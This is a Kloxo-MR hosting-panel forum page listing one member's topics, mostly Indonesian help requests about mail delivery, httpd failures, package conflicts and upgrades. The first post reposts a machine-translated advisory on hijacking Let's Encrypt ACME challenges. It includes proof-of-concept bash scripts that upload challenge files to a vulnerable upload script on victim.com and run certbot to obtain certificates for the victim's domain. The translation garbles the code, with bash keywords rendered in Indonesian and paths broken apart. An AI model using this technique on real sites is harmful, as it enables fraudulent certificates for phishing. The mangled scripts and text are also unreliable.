Sponsor:

Server and Web Integrator
Link:
Kloxo-MR logo
6.5.0 or 7.0.0
Click for "How to install"
Donation/Sponsorship:
Kloxo-MR is open-source.
Donate and or Sponsorship always welcome.
Click to:
Click Here
Please login or register. 2018-09-24, 07:08:13

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - Miki

Pages: [1] 2 3
1
1. Ikhtisar

Let's Encrypt dapat diakali dengan mengeluarkan sertifikat SSL ke remote
penyerang dengan membajak tantangan ACME melalui eksploitasi jarak jauh yang mungkin
ada di situs web korban.


2. Detail

The Let's Encrypt Certificate Authority dapat disalahgunakan untuk mengeluarkan SSL
sertifikat untuk penyerang, dengan memanfaatkan berbagai remote
teknik eksploitasi yang membajak rutinitas validasi tantangan ACME.
Dalam setiap skenario yang disajikan, sertifikat diminta dan diberikan pada a
mesin remote dikendalikan oleh penyerang. Mari Enkripsi utilitas (seperti
certbot) tidak perlu dipasang di server yang menghosting situs web korban.

Beberapa skenario serangan disajikan:
1) Memanfaatkan kerentanan pengunggahan file tak terbatas di situs web korban
2) Memanfaatkan izin miskin dalam lingkungan hosting bersama
3) Memanfaatkan serangan Man In the Middle (MITM) untuk mengubah lalu lintas jaringan
4) Memanfaatkan proxy berbahaya untuk mengubah lalu lintas HTTP

Setiap skenario membutuhkan kerentanan jarak jauh untuk ada di situs web korban
atau lingkungan yang dihosting; namun, dengan menambahkan pengamanan tambahan, Let's Encrypt
dapat mencegah sertifikat palsu dikeluarkan untuk penyerang.


3. Dampak

Penyerang yang mendapatkan sertifikat SSL yang valid untuk situs web korban dapat menggunakannya
kepada pengunjung situs web phishing.

Jika penyerang dapat: 1) menipu pengunjung agar menggunakan server DNS berbahaya
atau 2) menggunakan serangan tingkat jaringan seperti keracunan ARP cache untuk mengalihkan DNS
permintaan ke server web palsu, pengunjung akan dikirim ke kloning
situs web, menggunakan nama domain yang sama, dengan sertifikat SSL yang valid, memaksimalkan
keberhasilan kampanye phishing.


4. Eksploitasi

Eksploitasi untuk skenario pengunggahan file tidak terbatas disediakan, dan
menunjukkan bagaimana validasi tantangan ACME dapat dibajak. Yang lain
Skenario serangan dijelaskan dalam istilah teoritis dan diyakini
dieksploitasi karena masing-masing membajak validasi tantangan ACME.


4a. Exploit - Proof of Concept (Pengunggahan File Tidak Terbatas)

Dalam skenario berikut ini, kami menemukan situs web korban yang mencakup
kerentanan jarak jauh, yang memungkinkan pengunggahan file tanpa batas dan nyaman
(dan tidak realistis) memindahkan file langsung ke .well-known / acme-challenge
direktori. Meskipun skenario ini kemungkinan tidak akan pernah terjadi, ini menunjukkan hal itu
tantangan ACME dapat dihasilkan pada mesin jarak jauh dan untuk sementara ditempatkan
situs web korban untuk memvalidasi tantangan. Sertifikat ini kemudian diterbitkan
mesin penyerang.

    # Script Rentan: http://victim.com/le-receive.php
    # Remote penyerang menggunakan skrip berikut: lt-waitsend.sh

    #! / bin / bash

    FAKEWEBROOT = / tmp / fake / .well-known / acme-challenge

    # Terus periksa apakah certbot telah menghasilkan tantangan ACME
    # dan unggah ke korban segera setelah tersedia
    sampai [-f $ {FAKEWEBROOT} / *]
    melakukan
      tidur 0,1
    selesai
    lefile = `ls -1 $ {FAKEWEBROOT} / *`
    echo "Ditemukan $ {lefile}"
    curl -i -X ??POST -H "Content-Type: multipart / form-data"
        -F "data = @ $ {lefile}" http://victim.com/le-receive.php
    keluar


    # Remote penyerang mengeksekusi yang berikut:

    ~ $ ./lt-waitsend.sh
    ~ $ ./certbot-auto certonly --staging --no-self-upgrade
        --webroot -w / tmp / fake -d victim.com


4b. Exploit - Skenario Realistis (Pengunggahan File Tidak Terbatas)

Skenario yang lebih realistis disajikan di mana victim.com menyertakan skrip yang
memungkinkan pengunggahan file tidak terbatas dan webroot dimiliki oleh pengguna apache.

    # Script Rentan: http://victim.com/le-receive2.php:
    # Penyerang mengunggah skrip berikut (le-create.php) ke victim.com melalui
    # Kerentanan jarak jauh. Skrip akan menunggu tantangan ACME
    # Diunggah melalui kerentanan jarak jauh dan memindahkannya ke lokasi yang benar

    # Penyerang memanfaatkan skrip berikut untuk menghasilkan sertifikat dan
    # memindahkannya ke tempatnya: lt-waitsend.sh

    #! / bin / bash

    FAKEWEBROOT = / tmp / fake / .well-known / acme-challenge

    sampai [-f $ {FAKEWEBROOT} / *]
    melakukan
        tidur 0,1
    selesai
    lefile = `ls -1 $ {FAKEWEBROOT} / *`
    echo "Ditemukan $ {lefile}"
    curl -i -X ??POST -H "Content-Type: multipart / form-data"
        -F "data = @ $ {lefile}" http://victim.com/le-receive.php
    curl http://victim.com/temp/le-create.php
    keluar

    # Remote penyerang mengeksekusi yang berikut:
    ~ $ ./lt-waitsend.sh
    ~ $ ./certbot-auto certonly --staging --no-self-upgrade
         --webroot -w / tmp / fake -d victim.com

    # Pada titik ini penyerang dapat membersihkan file jauh untuk tidak meninggalkan jejak.


4c. Eksploitasi Diskusi

Eksploitasi di atas menunjukkan bahwa tantangan ACME dapat dihasilkan pada a
mesin penyerang jarak jauh dan ditransfer sementara ke mesin korban
melalui kerentanan jarak jauh, memungkinkan tantangan untuk divalidasi dan
mengeluarkan sertifikat kepada penyerang.

Demikian juga, lingkungan hosting bersama yang tidak dikonfigurasi dengan baik dapat menyajikan
masalah yang sama. Misalnya jika dua situs web di server yang sama keduanya memiliki webroots
dimiliki oleh apache: apac

2
Indonesia Users / ASK minta petunjuk terkait mail.domain.tld
« on: 2017-09-08, 11:28:36 »
Mohon petujuknya:
Tidak dapat membuat damain baru atau pun subdomain : dengan nama mail.domain.tld

Alert: Not permit webmail/mail/lists/cp/www/default as subdomain [mail.domain.tld]

bagaimana agar mail.domain.tld tersebut bisa di isi konten layaknya sebuah situs?

Terimakasih sebelumnya.

3
Indonesia Users / ask HTTPD FAILED
« on: 2016-09-15, 21:36:06 »
 :o Sudah dibulak balik tetap falied.. how to fix.. ?
Code: [Select]
*** Restart services - BEGIN ***

Shutting down MySQL. SUCCESS!
Starting MySQL. SUCCESS!
-------------------------------------------------------------------

Stopping httpd:                                            [FAILED]
Starting httpd: httpd.event: Syntax error on line 63 of /etc/httpd/conf/httpd.conf: Syntax error on line 4 of /etc/httpd/conf.d/fastcgi.conf: Cannot load /etc/httpd/modules/mod_fastcgi.so into server: /etc/httpd/modules/mod_fastcgi.so: cannot open shared object file: No such file or directory
                                                           [FAILED]
-------------------------------------------------------------------

Stopping Hiawatha web server:                              [  OK  ]
Starting Hiawatha web server:                              [  OK  ]
-------------------------------------------------------------------


*** Process for QMAIL service ***
Stopping qmail-toaster: svscan qmail logging.
qmail-send: no process killed
Starting qmail-toaster: svscan.
-------------------------------------------------------------------

- For help, type '/script/restart-mail [--help|-h]'
-------------------------------------------------------------------

Stopping pure-ftpd:                                        [  OK  ]
Starting pure-ftpd:                                        [  OK  ]
-------------------------------------------------------------------

Stopping php55m-fpm (PHP Used):                            [  OK  ]
Starting php55m-fpm (PHP Used):                            [  OK  ]
-------------------------------------------------------------------
*** Restart services - END ***

Code: [Select]
A. Control Panel:
   - Kloxo-MR: 7.0.0.b-2016091501
   - Web: hiawatha-10.3.0-f.1.mr.el5
   - PHP: php54s-5.4.45-1.ius.el5 (fpm mode)
B. Plateform:
   - OS: CentOS release 5.11 (Final) x86_64
   - Hostname: my.domain.tld
C. Services:
   1. MySQL: MariaDB-server-10.0.27-1
   2. PHP:
      - Installed:
        - Branch: php54-cli-5.4.45-1.ius.el5
        - Multiple:
          * php52m-5.2.17-102.mr.el5
          * php53m-5.3.29-1.ius.el5
          * php54m-5.4.45-1.ius.el5
          * php55m-5.5.38-1.w5
      - Used: php55m-fpm
      - Multiple: disable
   3. Web Used: hiawathaproxy
     - Hiawatha: hiawatha-10.3.0-f.1.mr.el5
     - Lighttpd: lighttpd-1.4.39-3.el5
     - Nginx: nginx-1.11.4-1.el5.ngx
     - Apache: httpd-2.2.31-1.mr.el5
       - PHP Type: php-fpm_event
       - Secondary PHP: on
   4. WebCache: varnish
     - ATS: --uninstalled--
     - Squid: --uninstalled--
     - Varnish: --uninstalled--
   5. Dns: bind
     - Bind: --uninstalled--
     - DJBDns: --uninstalled--
     - NSD: --uninstalled--
     - PowerDNS: --uninstalled--
     - Yadifa: --uninstalled--
   6. Mail: qmail-toaster-1.03-1.3.55.mr.el5
      - pop3/imap4: none
      - smtp: none
      - spam: --uninstalled--
   7. Stats: awstats
D. Memory:
                total       used       free     shared    buffers     cached
   Mem:         15047       1387      13659          0         88        792
   -/+ buffers/cache:        506      14540
   Swap:        17055          0      17055

4
Indonesia Users / ask install phalcon
« on: 2016-09-12, 11:36:23 »
Mohon petunjuk install phalcon gagal teyuz  ;D

5
Indonesia Users / kirim email ke gmail mr7 di anggap spam
« on: 2015-04-12, 15:18:28 »
berdasarkan hasil investigasi dari http://www.intodns.com/ nilai rapotnya tidak ada yang merah tetapi masih saja email di anggap spam  ::)

semua fitur berikut sudah di aktifkan semua:

Domainkeys
Enable Spamdyke
Enable SPF
Enable DMARC

Mohon pencerahannya master..
PTR pun sudah didaftarkan ke ISP nya..

info tambahan: hasil diagnosa
- domain pertama IP 100.100.1001
- domain kedua IP 100.100.100.2
IP pengirim tidak sama dengan IP domain.
IP pengirim ternyata menggunakan IP Pertama yang seharusnya menggunakan IP kedua.

Thx

6
Indonesia Users / Alert: MailAccount add failed MR7
« on: 2015-04-12, 07:40:10 »
Lapor Master .. Alert: MailAccount add failed pada kloxo-mr7 hanya pada 1 nama domain sedangkan pada domain lain normal?

sudah mencoba hapus domain dan add new domain baik pada admin maupun pada client juga mencoba cleanup tetap saja tidak bisa add mail account.. ada cara lainkah?

7
Indonesia Users / server alias MR7
« on: 2015-04-12, 03:35:42 »
Selamat pagi Master :) server alias tidak berfungsi sebagaimana pada versi sebelumnya?
saya sudah lakukan mengahapus seluruh server alias namun ketika ingin memasukan kembali ada masalah pada server alias tersebut tidak menginjinkan memasukan 1 buah karater' contoh:

nama domain: mratwork.com
server alias: m
-- sehingga pada browser dapat dipanggil dengan : m.mratwork.com

pada versi sebelumnya server alias berjalan sebagaimana yang diharapkan.

Mohon pencerahan master.. thx



8
Indonesia Users / log mail mulai datang relay yang aneh
« on: 2015-04-10, 22:09:20 »
log mail mulai datang relay yang aneh setelah log ini datang :
Code: [Select]
CONNECT / index.php?option=com_content&view=article&id=82 http/1.1?

9
Indonesia Users / login failed setelah upgrade ke kloxo-mr7
« on: 2015-04-10, 14:40:55 »
saya sudah melakukan
Code: [Select]
yum remove *-toaster; yum install *-toaster cronie cronie-anacron crontabs webalizer fetchmail; sh /script/fixmail-all; sh /script/restart-bahkan sudah melakukan reboot.

need help--

10
Indonesia Users / {Webserver Configure} dan {Switch Program}
« on: 2015-04-10, 14:38:09 »
sungguh membingungkan begitu banyak pilihan pada {Webserver Configure} dan {Switch Program}

butuh pencerahan mana yang harus dipilih untuk Drupal ?

502 Bad Gateway setelah memilih nginx proxy serta varnish
Service Unavailable setelah memilih hiawatha proxy serta varnish
Error 503 Service Unavailable setelah memilih lighttpd serta varnish

11
Quote
yum install *-toaster webalizer cronie cronie-anacron crontabs

Transaction Check Error:
  file /etc/my.cnf from install of MariaDB-common-10.0.17-1.i386 conflicts with file from package mysql55-libs-5.5.42-1.ius.el5.i386

help..

12
Code: [Select]
yum install *-toaster webalizer cronie cronie-anacron crontabsTransaction Check Error:
  file /etc/my.cnf from install of MariaDB-common-10.0.17-1.i386 conflicts with file from package mysql55-libs-5.5.42-1.ius.el5.i386

help.. thx

Code: [Select]
A. Kloxo-MR: 6.5.0.f-2014020301

B. OS: CentOS release 5.10 (Final) i686

C. Apps:
   1. MySQL: mysql55-5.5.42-1.ius.el5
   2. PHP: php54-5.4.39-1.ius.el5
   3. Httpd: httpd-2.2.29-1.mr.el5
   4. Lighttpd: --uninstalled--
   5. Nginx: --uninstalled--
   6. Qmail: --uninstalled--
   7. Dns: bind-9.9.5-1.el5

D. Php-type (for Httpd/proxy): mod_php_ruid2

E. Memory:
                total       used       free     shared    buffers     cached
   Mem:          2026       1374        652          0        209        727
   -/+ buffers/cache:        436       1589
   Swap:         4095          0       4095

13
Indonesia Users / Email dari <#@[]>
« on: 2014-11-10, 07:39:49 »
Mohon pencerahan, belakangan ini sering sekali ada email dari <#@[]> berikut scrensutnya disertakan pada attachment.

Terima kasih.

14
Indonesia Users / Up dari versi 650 ke versi 7
« on: 2014-09-18, 14:43:27 »
Kloxo-MR: error 503 found!
Code: [Select]
*** Executing Update (cleanup) - END ***

*** Restart services - BEGIN ***
Stopping nginx:                                            [  OK  ]
Starting nginx:                                            [  OK  ]
Stopping qmail-toaster: svscan qmail logging.
qmail-send: no process killed
Starting qmail-toaster: svscan.
Stopping xinetd:                                           [  OK  ]
Starting xinetd:                                           [  OK  ]
Execute fixlxphpexe for php53s...
sh: /usr/bin/rpm: No such file or directory
Stopping kloxo-phpcgi:                                     [FAILED]
Starting kloxo-phpcgi: /usr/local/lxlabs/kloxo/init/kloxo-phpcgi: line 10: /opt/php53s/usr/sbin/php-fpm: No such file or directory
/usr/local/lxlabs/kloxo/init/kloxo-phpcgi: line 10: exec: /opt/php53s/usr/sbin/php-fpm: cannot execute: No such file or directory
                                                           [FAILED]
Stopping kloxo-hiawatha:                                   [  OK  ]
Starting kloxo-hiawatha:                                   [  OK  ]
*** Restart services - END ***

Mohon Pencerahan..

thx

15
help..
Code: [Select]
deferral: /bin/sh:_/home/vpopmail/bin/vdelivermail:_Permission_denied/
thx

Pages: [1] 2 3

Top 4 Global Search Engines:    Google    Bing    Baidu    Yahoo
Click Here

Page created in 0.06 seconds with 20 queries.

web stats analysis